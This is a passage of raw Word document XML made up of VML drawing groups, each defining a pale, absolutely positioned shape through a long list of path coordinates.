1351,2920,1353,2920,1354,2920,1356,2920,1358,2920,1360,2920,1362,2920,1364,2920,1367,2920,1369,2920,1371,2920,1374,2920,1376,2920,1379,2920,1381,2920,1384,2920,1387,2920,1389,2920,1392,2920,1395,2920,1398,2920,1401,2920,1404,2920,1408,2920,1411,2920,1414,2920,1418,2920,1421,2920,1425,2920,1429,2920,1433,2920,1436,2920,1440,2920,1444,2920,1449,2920,1453,2920,1457,2920,1462,2920,1466,2920,1471,2920,1475,2920,1480,2920,1485,2920,1490,2920,1495,2920,1500,2920,1505,2920,1511,2920,1516,2920,1522,2920,1527,2920,1533,2920,1539,2920,1545,2920,1551,2920,1557,2920,1563,2920,1570,2920,1570,2920,1570,2920,1570,2920,1570,2920,1570,2920,1570,2920,1570,2920,1570,2920,1570,2920,1570,2920,1570,2920,1570,2920,1570,2920,1570,2920,1570,2920,1570,2920,1570,2920,1570,2920,1570,2920,1570,2920,1570,2920,1570,2920,1570,2920,1570,2919,1570,2919,1570,2919,1570,2919,1570,2919,1570,2919,1570,2919,1570,2918,1570,2918,1570,2918,1570,2918,1570,2917,1570,2917,1570,2917,1570,2917,1570,2916,1570,2916,1570,2916,1570,2915,1570,2915,1570,2914,1570,2914,1570,2914,1570,2913,1570,2913,1570,2912,1570,2912,1570,2911,1570,2910,1570,2910,1570,2909,1570,2909,1570,2908,1570,2907,1570,2907,1570,2906,1570,2905,1570,2904,1570,2903,1570,2903,1570,2902,1570,2901,1570,2900,1570,2899,1570,2898,1570,2897,1570,2896,1570,2895,1570,2894,1570,2893,1570,2892,1570,2890,1570,2889,1570,2888,1570,2887,1570,2885,1570,2884,1570,2883,1570,2881,1570,2880,1570,2878,1570,2877,1570,2875,1570,2874,1570,2872,1570,2870,1570,2869,1570,2867,1570,2865,1570,2863,1570,2861,1570,2859,1570,2857,1570,2855,1570,2853,1570,2851,1570,2849,1570,2847,1570,2845,1570,2843,1570,2840,1570,2838,1570,2836,1570,2833,1570,2831,1570,2828,1570,2826,1570,2823,1570,2820,1570,2818,1570,2815,1570,2812,1570,2809,1570,2806,1570,2803,1570,2800,1570,2800,1570,2800,1570,2800,1570,2800,1570,2800,1570,2800,1570,2800,1570,2800,1570,2800,1570,2800,1570,2800,1570,2800,1570,2800,1570,2800,1569,2800,1569,2800,1569,2800,1569,2800,1569,2800,1569,2800,1569,2800,1569,2800,1568,2800,1568,2800,1568,2800,1568,2800,1567,2800,1567,2800,1567,2800,1566,2800,1566,2800,1566,2800,1565,2800,1565,2800,1564,2800,1564,2800,1563,2800,1563,2800,1562,2800,1561,2800,1561,2800,1560,2800,1559,2800,1559,2800,1558,2800,1557,2800,1556,2800,1555,2800,1554,2800,1553,2800,1552,2800,1551,2800,1550,2800,1549,2800,1547,2800,1546,2800,1545,2800,1543,2800,1542,2800,1540,2800,1539,2800,1537,2800,1535,2800,1534,2800,1532,2800,1530,2800,1528,2800,1526,2800,1524,2800,1522,2800,1520,2800,1518,2800,1516,2800,1513,2800,1511,2800,1508,2800,1506,2800,1503,2800,1501,2800,1498,2800,1495,2800,1492,2800,1489,2800,1486,2800,1483,2800,1480,2800,1477,2800,1473,2800,1470,2800,1467,2800,1463,2800,1459,2800,1456,2800,1452,2800,1448,2800,1444,2800,1440,2800,1436,2800,1432,2800,1427,2800,1423,2800,1418,2800,1414,2800,1409,2800,1404,2800,1399,2800,1395,2800,1389,2800,1384,2800,1379,2800,1374,2800,1368,2800,1363,2800,1357,2800,1351,2800,1345,2800,1340,2800,1333,2800,1327,2800,1321,2800,1315e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:139.500pt;margin-top:97.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2790,1950" coordsize="130,250">
        <v:shape style="position:absolute;left:2790;top:1950;width:130;height:250" coordorigin="2790,1950" coordsize="130,250" path="m2800,1960l2800,1960,2800,1960,2800,1960,2800,1960,2800,1960,2800,1960,2800,1960,2800,1960,2800,1960,2800,1960,2800,1960,2801,1960,2801,1960,2801,1960,2801,1960,2801,1960,2801,1960,2801,1960,2801,1960,2801,1960,2801,1960,2801,1960,2801,1960,2801,1960,2801,1960,2802,1960,2802,1960,2802,1960,2802,1960,2802,1960,2802,1960,2803,1960,2803,1960,2803,1960,2803,1960,2803,1960,2804,1960,2804,1960,2804,1960,2805,1960,2805,1960,2805,1960,2806,1960,2806,1960,2806,1960,2807,1960,2807,1960,2808,1960,2808,1960,2809,1960,2809,1960,2810,1960,2810,1960,2811,1960,2812,1960,2812,1960,2813,1960,2814,1960,2814,1960,2815,1960,2816,1960,2817,1960,2817,1960,2818,1960,2819,1960,2820,1960,2821,1960,2822,1960,2823,1960,2824,1960,2825,1960,2826,1960,2827,1960,2828,1960,2829,1960,2830,1960,2832,1960,2833,1960,2834,1960,2836,1960,2837,1960,2838,1960,2840,1960,2841,1960,2843,1960,2844,1960,2846,1960,2847,1960,2849,1960,2851,1960,2852,1960,2854,1960,2856,1960,2858,1960,2860,1960,2861,1960,2863,1960,2865,1960,2867,1960,2870,1960,2872,1960,2874,1960,2876,1960,2878,1960,2881,1960,2883,1960,2885,1960,2888,1960,2890,1960,2893,1960,2895,1960,2898,1960,2901,1960,2903,1960,2906,1960,2909,1960,2912,1960,2915,1960,2917,1960,2920,1960,2920,1960,2920,1960,2920,1960,2920,1960,2920,1960,2920,1960,2920,1960,2920,1960,2920,1960,2920,1960,2920,1960,2920,1960,2920,1960,2920,1960,2920,1960,2920,1960,2920,1961,2920,1961,2920,1961,2920,1961,2920,1961,2920,1961,2920,1962,2920,1962,2920,1962,2920,1962,2920,1963,2920,1963,2920,1963,2920,1964,2920,1964,2920,1964,2920,1965,2920,1965,2920,1966,2920,1966,2920,1967,2920,1968,2920,1968,2920,1969,2920,1970,2920,1970,2920,1971,2920,1972,2920,1973,2920,1974,2920,1975,2920,1976,2920,1977,2920,1978,2920,1979,2920,1980,2920,1981,2920,1983,2920,1984,2920,1985,2920,1987,2920,1988,2920,1990,2920,1991,2920,1993,2920,1994,2920,1996,2920,1998,2920,2000,2920,2002,2920,2004,2920,2006,2920,2008,2920,2010,2920,2012,2920,2014,2920,2016,2920,2019,2920,2021,2920,2024,2920,2026,2920,2029,2920,2032,2920,2035,2920,2038,2920,2040,2920,2043,2920,2047,2920,2050,2920,2053,2920,2056,2920,2060,2920,2063,2920,2067,2920,2070,2920,2074,2920,2078,2920,2082,2920,2086,2920,2090,2920,2094,2920,2098,2920,2102,2920,2107,2920,2111,2920,2116,2920,2121,2920,2125,2920,2130,2920,2135,2920,2140,2920,2145,2920,2151,2920,2156,2920,2161,2920,2167,2920,2173,2920,2178,2920,2184,2920,2190,2920,2196,2920,2202,2920,2209,2920,2215,2920,2215,2920,2215,2920,2215,2920,2215,2920,2215,2920,2215,2920,2215,2920,2215,2920,2215,2920,2215,2920,2215,2920,2215,2920,2215,2920,2215,2920,2215,2920,2215,2920,2215,2920,2215,2920,2215,2920,2215,2920,2215,2920,2215,2920,2215,2920,2215,2919,2215,2919,2215,2919,2215,2919,2215,2919,2215,2919,2215,2919,2215,2918,2215,2918,2215,2918,2215,2918,2215,2917,2215,2917,2215,2917,2215,2917,2215,2916,2215,2916,2215,2916,2215,2915,2215,2915,2215,2914,2215,2914,2215,2914,2215,2913,2215,2913,2215,2912,2215,2912,2215,2911,2215,2910,2215,2910,2215,2909,2215,2909,2215,2908,2215,2907,2215,2907,2215,2906,2215,2905,2215,2904,2215,2903,2215,2903,2215,2902,2215,2901,2215,2900,2215,2899,2215,2898,2215,2897,2215,2896,2215,2895,2215,2894,2215,2893,2215,2892,2215,2890,2215,2889,2215,2888,2215,2887,2215,2885,2215,2884,2215,2883,2215,2881,2215,2880,2215,2878,2215,2877,2215,2875,2215,2874,2215,2872,2215,2870,2215,2869,2215,2867,2215,2865,2215,2863,2215,2861,2215,2859,2215,2857,2215,2855,2215,2853,2215,2851,2215,2849,2215,2847,2215,2845,2215,2843,2215,2840,2215,2838,2215,2836,2215,2833,2215,2831,2215,2828,2215,2826,2215,2823,2215,2820,2215,2818,2215,2815,2215,2812,2215,2809,2215,2806,2215,2803,2215,2800,2215,2800,2215,2800,2215,2800,2215,2800,2215,2800,2215,2800,2215,2800,2215,2800,2215,2800,2215,2800,2215,2800,2215,2800,2215,2800,2215,2800,2215,2800,2215,2800,2215,2800,2214,2800,2214,2800,2214,2800,2214,2800,2214,2800,2214,2800,2214,2800,2213,2800,2213,2800,2213,2800,2212,2800,2212,2800,2212,2800,2211,2800,2211,2800,2211,2800,2210,2800,2210,2800,2209,2800,2209,2800,2208,2800,2207,2800,2207,2800,2206,2800,2205,2800,2205,2800,2204,2800,2203,2800,2202,2800,2201,2800,2200,2800,2199,2800,2198,2800,2197,2800,2196,2800,2195,2800,2194,2800,2193,2800,2191,2800,2190,2800,2189,2800,2187,2800,2186,2800,2184,2800,2182,2800,2181,2800,2179,2800,2177,2800,2175,2800,2174,2800,2172,2800,2170,2800,2168,2800,2165,2800,2163,2800,2161,2800,2159,2800,2156,2800,2154,2800,2151,2800,2149,2800,2146,2800,2143,2800,2140,2800,2138,2800,2135,2800,2132,2800,2129,2800,2125,2800,2122,2800,2119,2800,2115,2800,2112,2800,2108,2800,2105,2800,2101,2800,2097,2800,2093,2800,2089,2800,2085,2800,2081,2800,2077,2800,2073,2800,2068,2800,2064,2800,2059,2800,2054,2800,2050,2800,2045,2800,2040,2800,2035,2800,2030,2800,2024,2800,2019,2800,2014,2800,2008,2800,2002,2800,1997,2800,1991,2800,1985,2800,1979,2800,1973,2800,1966,2800,1960e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:139.500pt;margin-top:128.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2790,2570" coordsize="130,270">
        <v:shape style="position:absolute;left:2790;top:2570;width:130;height:270" coordorigin="2790,2570" coordsize="130,270" path="m2800,2590l2800,2590,2800,2590,2800,2590,2800,2590,2800,2590,2800,2590,2800,2590,2800,2590,2800,2590,2800,2590,2800,2590,2801,2590,2801,2590,2801,2590,2801,2590,2801,2590,2801,2590,2801,2590,2801,2590,2801,2590,2801,2590,2801,2590,2801,2590,2801,2590,2801,2590,2802,2590,2802,2590,2802,2590,2802,2590,2802,2590,2802,2590,2803,2590,2803,2590,2803,2590,2803,2590,2803,2590,2804,2590,2804,2590,2804,2590,2805,2590,2805,2590,2805,2590,2806,2590,2806,2590,2806,2590,2807,2590,2807,2590,2808,2590,2808,2590,2809,2590,2809,2590,2810,2590,2810,2590,2811,2590,2812,2590,2812,2590,2813,2590,2814,2590,2814,2590,2815,2590,2816,2590,2817,2590,2817,2590,2818,2590,2819,2590,2820,2590,2821,2590,2822,2590,2823,2590,2824,2590,2825,2590,2826,2590,2827,2590,2828,2590,2829,2590,2830,2590,2832,2590,2833,2590,2834,2590,2836,2590,2837,2590,2838,2590,2840,2590,2841,2590,2843,2590,2844,2590,2846,2590,2847,2590,2849,2590,2851,2590,2852,2590,2854,2590,2856,2590,2858,2590,2860,2590,2861,2590,2863,2590,2865,2590,2867,2590,2870,2590,2872,2590,2874,2590,2876,2590,2878,2590,2881,2590,2883,2590,2885,2590,2888,2590,2890,2590,2893,2590,2895,2590,2898,2590,2901,2590,2903,2590,2906,2590,2909,2590,2912,2590,2915,2590,2917,2590,2920,2590,2920,2590,2920,2590,2920,2590,2920,2590,2920,2590,2920,2590,2920,2590,2920,2590,2920,2590,2920,2590,2920,2590,2920,2591,2920,2591,2920,2591,2920,2591,2920,2591,2920,2591,2920,2591,2920,2591,2920,2591,2920,2592,2920,2592,2920,2592,2920,2592,2920,2592,2920,2593,2920,2593,2920,2593,2920,2594,2920,2594,2920,2594,2920,2595,2920,2595,2920,2596,2920,2596,2920,2597,2920,2597,2920,2598,2920,2599,2920,2599,2920,2600,2920,2601,2920,2602,2920,2602,2920,2603,2920,2604,2920,2605,2920,2606,2920,2607,2920,2608,2920,2609,2920,2610,2920,2612,2920,2613,2920,2614,2920,2615,2920,2617,2920,2618,2920,2620,2920,2621,2920,2623,2920,2625,2920,2626,2920,2628,2920,2630,2920,2632,2920,2634,2920,2636,2920,2638,2920,2640,2920,2642,2920,2644,2920,2647,2920,2649,2920,2652,2920,2654,2920,2657,2920,2659,2920,2662,2920,2665,2920,2668,2920,2671,2920,2674,2920,2677,2920,2680,2920,2683,2920,2687,2920,2690,2920,2693,2920,2697,2920,2701,2920,2704,2920,2708,2920,2712,2920,2716,2920,2720,2920,2724,2920,2728,2920,2733,2920,2737,2920,2742,2920,2746,2920,2751,2920,2756,2920,2761,2920,2766,2920,2771,2920,2776,2920,2781,2920,2786,2920,2792,2920,2797,2920,2803,2920,2809,2920,2815,2920,2821,2920,2827,2920,2833,2920,2839,2920,2845,2920,2845,2920,2845,2920,2845,2920,2845,2920,2845,2920,2845,2920,2845,2920,2845,2920,2845,2920,2845,2920,2845,2920,2845,2920,2845,2920,2845,2920,2845,2920,2845,2920,2845,2920,2845,2920,2845,2920,2845,2920,2845,2920,2845,2920,2845,2920,2845,2919,2845,2919,2845,2919,2845,2919,2845,2919,2845,2919,2845,2919,2845,2918,2845,2918,2845,2918,2845,2918,2845,2917,2845,2917,2845,2917,2845,2917,2845,2916,2845,2916,2845,2916,2845,2915,2845,2915,2845,2914,2845,2914,2845,2914,2845,2913,2845,2913,2845,2912,2845,2912,2845,2911,2845,2910,2845,2910,2845,2909,2845,2909,2845,2908,2845,2907,2845,2907,2845,2906,2845,2905,2845,2904,2845,2903,2845,2903,2845,2902,2845,2901,2845,2900,2845,2899,2845,2898,2845,2897,2845,2896,2845,2895,2845,2894,2845,2893,2845,2892,2845,2890,2845,2889,2845,2888,2845,2887,2845,2885,2845,2884,2845,2883,2845,2881,2845,2880,2845,2878,2845,2877,2845,2875,2845,2874,2845,2872,2845,2870,2845,2869,2845,2867,2845,2865,2845,2863,2845,2861,2845,2859,2845,2857,2845,2855,2845,2853,2845,2851,2845,2849,2845,2847,2845,2845,2845,2843,2845,2840,2845,2838,2845,2836,2845,2833,2845,2831,2845,2828,2845,2826,2845,2823,2845,2820,2845,2818,2845,2815,2845,2812,2845,2809,2845,2806,2845,2803,2845,2800,2845,2800,2845,2800,2845,2800,2845,2800,2845,2800,2845,2800,2845,2800,2845,2800,2845,2800,2845,2800,2845,2800,2845,2800,2845,2800,2845,2800,2845,2800,2845,2800,2845,2800,2845,2800,2845,2800,2845,2800,2844,2800,2844,2800,2844,2800,2844,2800,2844,2800,2843,2800,2843,2800,2843,2800,2842,2800,2842,2800,2842,2800,2841,2800,2841,2800,2840,2800,2840,2800,2839,2800,2839,2800,2838,2800,2838,2800,2837,2800,2836,2800,2836,2800,2835,2800,2834,2800,2833,2800,2833,2800,2832,2800,2831,2800,2830,2800,2829,2800,2828,2800,2827,2800,2825,2800,2824,2800,2823,2800,2822,2800,2820,2800,2819,2800,2817,2800,2816,2800,2814,2800,2813,2800,2811,2800,2809,2800,2808,2800,2806,2800,2804,2800,2802,2800,2800,2800,2798,2800,2796,2800,2794,2800,2791,2800,2789,2800,2787,2800,2784,2800,2782,2800,2779,2800,2776,2800,2774,2800,2771,2800,2768,2800,2765,2800,2762,2800,2759,2800,2756,2800,2752,2800,2749,2800,2746,2800,2742,2800,2739,2800,2735,2800,2731,2800,2728,2800,2724,2800,2720,2800,2716,2800,2711,2800,2707,2800,2703,2800,2699,2800,2694,2800,2689,2800,2685,2800,2680,2800,2675,2800,2670,2800,2665,2800,2660,2800,2655,2800,2649,2800,2644,2800,2638,2800,2633,2800,2627,2800,2621,2800,2615,2800,2609,2800,2603,2800,2597,2800,2590e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:139.500pt;margin-top:160.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2790,3210" coordsize="130,270">
        <v:shape style="position:absolute;left:2790;top:3210;width:130;height:270" coordorigin="2790,3210" coordsize="130,270" path="m2800,3236l2800,3236,2800,3236,2800,3236,2800,3236,2800,3236,2800,3236,2800,3236,2800,3236,2800,3236,2800,3236,2800,3236,2801,3236,2801,3236,2801,3236,2801,3236,2801,3236,2801,3236,2801,3236,2801,3236,2801,3236,2801,3236,2801,3236,2801,3236,2801,3236,2801,3236,2802,3236,2802,3236,2802,3236,2802,3236,2802,3236,2802,3236,2803,3236,2803,3236,2803,3236,2803,3236,2803,3236,2804,3236,2804,3236,2804,3236,2805,3236,2805,3236,2805,3236,2806,3236,2806,3236,2806,3236,2807,3236,2807,3236,2808,3236,2808,3236,2809,3236,2809,3236,2810,3236,2810,3236,2811,3236,2812,3236,2812,3236,2813,3236,2814,3236,2814,3236,2815,3236,2816,3236,2817,3236,2817,3236,2818,3236,2819,3236,2820,3236,2821,3236,2822,3236,2823,3236,2824,3236,2825,3236,2826,3236,2827,3236,2828,3236,2829,3236,2830,3236,2832,3236,2833,3236,2834,3236,2836,3236,2837,3236,2838,3236,2840,3236,2841,3236,2843,3236,2844,3236,2846,3236,2847,3236,2849,3236,2851,3236,2852,3236,2854,3236,2856,3236,2858,3236,2860,3236,2861,3236,2863,3236,2865,3236,2867,3236,2870,3236,2872,3236,2874,3236,2876,3236,2878,3236,2881,3236,2883,3236,2885,3236,2888,3236,2890,3236,2893,3236,2895,3236,2898,3236,2901,3236,2903,3236,2906,3236,2909,3236,2912,3236,2915,3236,2917,3236,2920,3236,2920,3236,2920,3236,2920,3236,2920,3236,2920,3236,2920,3236,2920,3236,2920,3236,2920,3236,2920,3236,2920,3236,2920,3236,2920,3236,2920,3236,2920,3236,2920,3236,2920,3236,2920,3236,2920,3237,2920,3237,2920,3237,2920,3237,2920,3237,2920,3237,2920,3238,2920,3238,2920,3238,2920,3239,2920,3239,2920,3239,2920,3240,2920,3240,2920,3241,2920,3241,2920,3242,2920,3242,2920,3243,2920,3243,2920,3244,2920,3245,2920,3245,2920,3246,2920,3247,2920,3248,2920,3249,2920,3249,2920,3250,2920,3251,2920,3252,2920,3253,2920,3255,2920,3256,2920,3257,2920,3258,2920,3259,2920,3261,2920,3262,2920,3264,2920,3265,2920,3267,2920,3268,2920,3270,2920,3272,2920,3273,2920,3275,2920,3277,2920,3279,2920,3281,2920,3283,2920,3285,2920,3288,2920,3290,2920,3292,2920,3295,2920,3297,2920,3300,2920,3302,2920,3305,2920,3307,2920,3310,2920,3313,2920,3316,2920,3319,2920,3322,2920,3325,2920,3329,2920,3332,2920,3335,2920,3339,2920,3342,2920,3346,2920,3350,2920,3354,2920,3357,2920,3361,2920,3365,2920,3370,2920,3374,2920,3378,2920,3383,2920,3387,2920,3392,2920,3396,2920,3401,2920,3406,2920,3411,2920,3416,2920,3421,2920,3426,2920,3432,2920,3437,2920,3443,2920,3448,2920,3454,2920,3460,2920,3466,2920,3472,2920,3478,2920,3484,2920,3491,2920,3491,2920,3491,2920,3491,2920,3491,2920,3491,2920,3491,2920,3491,2920,3491,2920,3491,2920,3491,2920,3491,2920,3491,2920,3491,2920,3491,2920,3491,2920,3491,2920,3491,2920,3491,2920,3491,2920,3491,2920,3491,2920,3491,2920,3491,2920,3491,2919,3491,2919,3491,2919,3491,2919,3491,2919,3491,2919,3491,2919,3491,2918,3491,2918,3491,2918,3491,2918,3491,2917,3491,2917,3491,2917,3491,2917,3491,2916,3491,2916,3491,2916,3491,2915,3491,2915,3491,2914,3491,2914,3491,2914,3491,2913,3491,2913,3491,2912,3491,2912,3491,2911,3491,2910,3491,2910,3491,2909,3491,2909,3491,2908,3491,2907,3491,2907,3491,2906,3491,2905,3491,2904,3491,2903,3491,2903,3491,2902,3491,2901,3491,2900,3491,2899,3491,2898,3491,2897,3491,2896,3491,2895,3491,2894,3491,2893,3491,2892,3491,2890,3491,2889,3491,2888,3491,2887,3491,2885,3491,2884,3491,2883,3491,2881,3491,2880,3491,2878,3491,2877,3491,2875,3491,2874,3491,2872,3491,2870,3491,2869,3491,2867,3491,2865,3491,2863,3491,2861,3491,2859,3491,2857,3491,2855,3491,2853,3491,2851,3491,2849,3491,2847,3491,2845,3491,2843,3491,2840,3491,2838,3491,2836,3491,2833,3491,2831,3491,2828,3491,2826,3491,2823,3491,2820,3491,2818,3491,2815,3491,2812,3491,2809,3491,2806,3491,2803,3491,2800,3491,2800,3491,2800,3491,2800,3491,2800,3491,2800,3491,2800,3491,2800,3491,2800,3491,2800,3491,2800,3491,2800,3491,2800,3491,2800,3490,2800,3490,2800,3490,2800,3490,2800,3490,2800,3490,2800,3490,2800,3490,2800,3490,2800,3489,2800,3489,2800,3489,2800,3489,2800,3488,2800,3488,2800,3488,2800,3487,2800,3487,2800,3487,2800,3486,2800,3486,2800,3485,2800,3485,2800,3484,2800,3484,2800,3483,2800,3482,2800,3482,2800,3481,2800,3480,2800,3480,2800,3479,2800,3478,2800,3477,2800,3476,2800,3475,2800,3474,2800,3473,2800,3472,2800,3471,2800,3469,2800,3468,2800,3467,2800,3466,2800,3464,2800,3463,2800,3461,2800,3460,2800,3458,2800,3456,2800,3455,2800,3453,2800,3451,2800,3449,2800,3447,2800,3445,2800,3443,2800,3441,2800,3439,2800,3437,2800,3434,2800,3432,2800,3429,2800,3427,2800,3424,2800,3422,2800,3419,2800,3416,2800,3413,2800,3410,2800,3407,2800,3404,2800,3401,2800,3398,2800,3394,2800,3391,2800,3388,2800,3384,2800,3380,2800,3377,2800,3373,2800,3369,2800,3365,2800,3361,2800,3357,2800,3353,2800,3348,2800,3344,2800,3339,2800,3335,2800,3330,2800,3325,2800,3320,2800,3315,2800,3310,2800,3305,2800,3300,2800,3295,2800,3289,2800,3284,2800,3278,2800,3272,2800,3266,2800,3261,2800,3254,2800,3248,2800,3242,2800,3236e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:139.500pt;margin-top:192.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2790,3850" coordsize="130,270">
        <v:shape style="position:absolute;left:2790;top:3850;width:130;height:270" coordorigin="2790,3850" coordsize="130,270" path="m2800,3866l2800,3866,2800,3866,2800,3866,2800,3866,2800,3866,2800,3866,2800,3866,2800,3866,2800,3866,2800,3866,2800,3866,2801,3866,2801,3866,2801,3866,2801,3866,2801,3866,2801,3866,2801,3866,2801,3866,2801,3866,2801,3866,2801,3866,2801,3866,2801,3866,2801,3866,2802,3866,2802,3866,2802,3866,2802,3866,2802,3866,2802,3866,2803,3866,2803,3866,2803,3866,2803,3866,2803,3866,2804,3866,2804,3866,2804,3866,2805,3866,2805,3866,2805,3866,2806,3866,2806,3866,2806,3866,2807,3866,2807,3866,2808,3866,2808,3866,2809,3866,2809,3866,2810,3866,2810,3866,2811,3866,2812,3866,2812,3866,2813,3866,2814,3866,2814,3866,2815,3866,2816,3866,2817,3866,2817,3866,2818,3866,2819,3866,2820,3866,2821,3866,2822,3866,2823,3866,2824,3866,2825,3866,2826,3866,2827,3866,2828,3866,2829,3866,2830,3866,2832,3866,2833,3866,2834,3866,2836,3866,2837,3866,2838,3866,2840,3866,2841,3866,2843,3866,2844,3866,2846,3866,2847,3866,2849,3866,2851,3866,2852,3866,2854,3866,2856,3866,2858,3866,2860,3866,2861,3866,2863,3866,2865,3866,2867,3866,2870,3866,2872,3866,2874,3866,2876,3866,2878,3866,2881,3866,2883,3866,2885,3866,2888,3866,2890,3866,2893,3866,2895,3866,2898,3866,2901,3866,2903,3866,2906,3866,2909,3866,2912,3866,2915,3866,2917,3866,2920,3866,2920,3866,2920,3866,2920,3866,2920,3866,2920,3866,2920,3866,2920,3866,2920,3866,2920,3866,2920,3866,2920,3866,2920,3866,2920,3866,2920,3866,2920,3866,2920,3866,2920,3867,2920,3867,2920,3867,2920,3867,2920,3867,2920,3867,2920,3868,2920,3868,2920,3868,2920,3868,2920,3869,2920,3869,2920,3869,2920,3870,2920,3870,2920,3870,2920,3871,2920,3871,2920,3872,2920,3872,2920,3873,2920,3874,2920,3874,2920,3875,2920,3876,2920,3876,2920,3877,2920,3878,2920,3879,2920,3880,2920,3881,2920,3882,2920,3883,2920,3884,2920,3885,2920,3886,2920,3887,2920,3888,2920,3890,2920,3891,2920,3893,2920,3894,2920,3895,2920,3897,2920,3899,2920,3900,2920,3902,2920,3904,2920,3906,2920,3908,2920,3909,2920,3911,2920,3914,2920,3916,2920,3918,2920,3920,2920,3922,2920,3925,2920,3927,2920,3930,2920,3932,2920,3935,2920,3938,2920,3941,2920,3943,2920,3946,2920,3949,2920,3953,2920,3956,2920,3959,2920,3962,2920,3966,2920,3969,2920,3973,2920,3976,2920,3980,2920,3984,2920,3988,2920,3992,2920,3996,2920,4000,2920,4004,2920,4008,2920,4013,2920,4017,2920,4022,2920,4027,2920,4031,2920,4036,2920,4041,2920,4046,2920,4051,2920,4057,2920,4062,2920,4067,2920,4073,2920,4079,2920,4084,2920,4090,2920,4096,2920,4102,2920,4108,2920,4115,2920,4121,2920,4121,2920,4121,2920,4121,2920,4121,2920,4121,2920,4121,2920,4121,2920,4121,2920,4121,2920,4121,2920,4121,2920,4121,2920,4121,2920,4121,2920,4121,2920,4121,2920,4121,2920,4121,2920,4121,2920,4121,2920,4121,2920,4121,2920,4121,2920,4121,2919,4121,2919,4121,2919,4121,2919,4121,2919,4121,2919,4121,2919,4121,2918,4121,2918,4121,2918,4121,2918,4121,2917,4121,2917,4121,2917,4121,2917,4121,2916,4121,2916,4121,2916,4121,2915,4121,2915,4121,2914,4121,2914,4121,2914,4121,2913,4121,2913,4121,2912,4121,2912,4121,2911,4121,2910,4121,2910,4121,2909,4121,2909,4121,2908,4121,2907,4121,2907,4121,2906,4121,2905,4121,2904,4121,2903,4121,2903,4121,2902,4121,2901,4121,2900,4121,2899,4121,2898,4121,2897,4121,2896,4121,2895,4121,2894,4121,2893,4121,2892,4121,2890,4121,2889,4121,2888,4121,2887,4121,2885,4121,2884,4121,2883,4121,2881,4121,2880,4121,2878,4121,2877,4121,2875,4121,2874,4121,2872,4121,2870,4121,2869,4121,2867,4121,2865,4121,2863,4121,2861,4121,2859,4121,2857,4121,2855,4121,2853,4121,2851,4121,2849,4121,2847,4121,2845,4121,2843,4121,2840,4121,2838,4121,2836,4121,2833,4121,2831,4121,2828,4121,2826,4121,2823,4121,2820,4121,2818,4121,2815,4121,2812,4121,2809,4121,2806,4121,2803,4121,2800,4121,2800,4121,2800,4121,2800,4121,2800,4121,2800,4121,2800,4121,2800,4121,2800,4121,2800,4121,2800,4121,2800,4121,2800,4121,2800,4121,2800,4121,2800,4121,2800,4121,2800,4120,2800,4120,2800,4120,2800,4120,2800,4120,2800,4120,2800,4119,2800,4119,2800,4119,2800,4119,2800,4118,2800,4118,2800,4118,2800,4117,2800,4117,2800,4117,2800,4116,2800,4116,2800,4115,2800,4115,2800,4114,2800,4113,2800,4113,2800,4112,2800,4111,2800,4111,2800,4110,2800,4109,2800,4108,2800,4107,2800,4106,2800,4105,2800,4104,2800,4103,2800,4102,2800,4101,2800,4100,2800,4099,2800,4097,2800,4096,2800,4094,2800,4093,2800,4092,2800,4090,2800,4088,2800,4087,2800,4085,2800,4083,2800,4081,2800,4079,2800,4078,2800,4076,2800,4073,2800,4071,2800,4069,2800,4067,2800,4065,2800,4062,2800,4060,2800,4057,2800,4055,2800,4052,2800,4049,2800,4046,2800,4044,2800,4041,2800,4038,2800,4035,2800,4031,2800,4028,2800,4025,2800,4021,2800,4018,2800,4014,2800,4011,2800,4007,2800,4003,2800,3999,2800,3995,2800,3991,2800,3987,2800,3983,2800,3979,2800,3974,2800,3970,2800,3965,2800,3960,2800,3956,2800,3951,2800,3946,2800,3941,2800,3936,2800,3930,2800,3925,2800,3920,2800,3914,2800,3908,2800,3903,2800,3897,2800,3891,2800,3885,2800,3879,2800,3872,2800,3866e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:139.500pt;margin-top:224.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2790,4490" coordsize="130,270">
        <v:shape style="position:absolute;left:2790;top:4490;width:130;height:270" coordorigin="2790,4490" coordsize="130,270" path="m2800,4511l2800,4511,2800,4511,2800,4511,2800,4511,2800,4511,2800,4511,2800,4511,2800,4511,2800,4511,2800,4511,2800,4511,2801,4511,2801,4511,2801,4511,2801,4511,2801,4511,2801,4511,2801,4511,2801,4511,2801,4511,2801,4511,2801,4511,2801,4511,2801,4511,2801,4511,2802,4511,2802,4511,2802,4511,2802,4511,2802,4511,2802,4511,2803,4511,2803,4511,2803,4511,2803,4511,2803,4511,2804,4511,2804,4511,2804,4511,2805,4511,2805,4511,2805,4511,2806,4511,2806,4511,2806,4511,2807,4511,2807,4511,2808,4511,2808,4511,2809,4511,2809,4511,2810,4511,2810,4511,2811,4511,2812,4511,2812,4511,2813,4511,2814,4511,2814,4511,2815,4511,2816,4511,2817,4511,2817,4511,2818,4511,2819,4511,2820,4511,2821,4511,2822,4511,2823,4511,2824,4511,2825,4511,2826,4511,2827,4511,2828,4511,2829,4511,2830,4511,2832,4511,2833,4511,2834,4511,2836,4511,2837,4511,2838,4511,2840,4511,2841,4511,28